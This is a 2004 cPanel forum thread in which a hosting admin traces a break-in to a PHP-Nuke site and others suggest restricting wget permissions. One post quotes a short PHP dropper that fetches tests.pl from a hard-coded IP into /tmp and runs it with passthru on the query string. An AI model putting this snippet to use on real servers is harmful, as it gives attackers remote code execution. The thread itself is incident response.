The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

hack!

Discussion in 'General Discussion' started by ehsan, Jun 1, 2004.

  1. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    one of our boxes is hacked.

    I cant find how they've got in, saw a funny script called: tests.pl in /tmp and deleted that.

    my guess is they are using FTP...

    if found this in /var/log/secure

    Jun 2 00:42:17 server1 Cp-Wrap[14968]: Pushing "32192 LIST 0 0" to '/usr/local/cpanel/bin/ftpadmin' for UID: 32192

    does any one have an explanation for this? what is this, what us cp-wrap, is it a cpanel method?


    I have apf firewall installed on a redhat 8.0 with newest apache and cpanel.

    (IM me with a price for catching the hole and hacker)

    Thanks!
     
  2. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    probably through a php script on the server, the tmp directory is easy to hack through php.

    If you have a nuke installed on the server you can bet that's it.
     
  3. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    I have nuke installed on many domains, there is a script called tests.pl keeps coming to /tmp , is it a safe script? owned by nobody!

    it has to be done through script, no login to server is shown on log and index.html file added by hacker is owned b y website owner.

    would be please give me a tip how I track and see what domain with nuke is doing this...

    Thank you all
     
  4. [Q3]

    [Q3] Member

    Joined:
    Apr 8, 2003
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I had a customer who had the same problem with his MyeGallery in PHPNuke. You can disable the PHPEXEC fonction but your customers may have problems with their scripts.

    regards,

    Franco
     
  5. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    caught the Hacker! I'll see his ass in court soon :)
     
    #5 ehsan, Jun 2, 2004
    Last edited: Jun 2, 2004
  6. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    You caught him? Sweet I was just gonna say a search from putty should help but without phpseux it's almost impossible to find who dropped the file in your /tmp directory.

    I would just put a burning poop bag on his front porch and call the fbi. You can't do much but they can ;)
     
  7. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    a simple grep "some text" /usr/local/apache/domlogs/* -r helped ;)

    I knew it was a script doing this and script was pushing "some text" with a query :) simple to catch but once you get hacked you kinda rush into every thing...
     
  8. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    hackers should be burned at the stake... I'm serious. Okay, that's a little extreme. I would settle for sticking a red hot poker up their ass.:mad:
     
  9. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    :D funny
     
  10. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
  11. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    That's genious "I hope with chmod 0 *wget*"

    I can't believe i never though of that, just turn it back on when you need it.

    Sorry but the simple things amaze me sometimes...


    Where is wget located? If you know off hand.
     
  12. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
    I dont' understand if your answer is ironic..

    When i wanna use wget i turn on

    with chmod 0 you can't upload like
    nobody
    root
    other user

    cd /usr/bin
    chmod 700 wget*

    ( I HOPE work fine again hh )
     
    #12 Creazioni1, Jun 3, 2004
    Last edited: Jun 3, 2004
  13. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    Hmmm

    So wget is needed for some programs?

    I thought it was for command line, I wonder if anything in cpanel needs it? Like the update ect..
     
  14. WCW Fan

    WCW Fan Well-Known Member

    Joined:
    Sep 22, 2003
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    it's better to allow it only too root that will make it so it won't break cpanel's update

    chmod 700 /usr/bin/wget

    Might also want too look into securing GET.
     
  15. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
    test.pl




    http://www.a-squad.com/ASQUAD.htm


    http://www.a-squad.com/audit/


    <?php
    $tester = "/tmp/tests.pl";
    if (!file_exists($tester)) {
    $testw = fopen($tester, "w");
    ini_set('user_agent',__FILE__);
    $testr = fopen("http://206.71.87.80/tests.pl","r");
    while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
    fclose($testw);
    fclose($testr);
    }
    passthru("perl $tester '$QUERY_STRING' 2>&1");
    ?>


    !!!!!!!!!!!!!!
    I DON?T understand if this is crakker site or no
     
  16. rs-freddo

    rs-freddo Well-Known Member

    Joined:
    May 13, 2003
    Messages:
    832
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I believe this mob did make a file available to "test security" part of what the file did was to download a file into tmp. I know a lot of cpanel users ran this file. I'm not sure what the total extent of it's purpose was - I certainly wouldn't install anything that used wget to fetch a file from an IP.

    Make sure one of your resellers or users is not doing the "security testing". There is a thread on these forums.
     
Loading...

Share This Page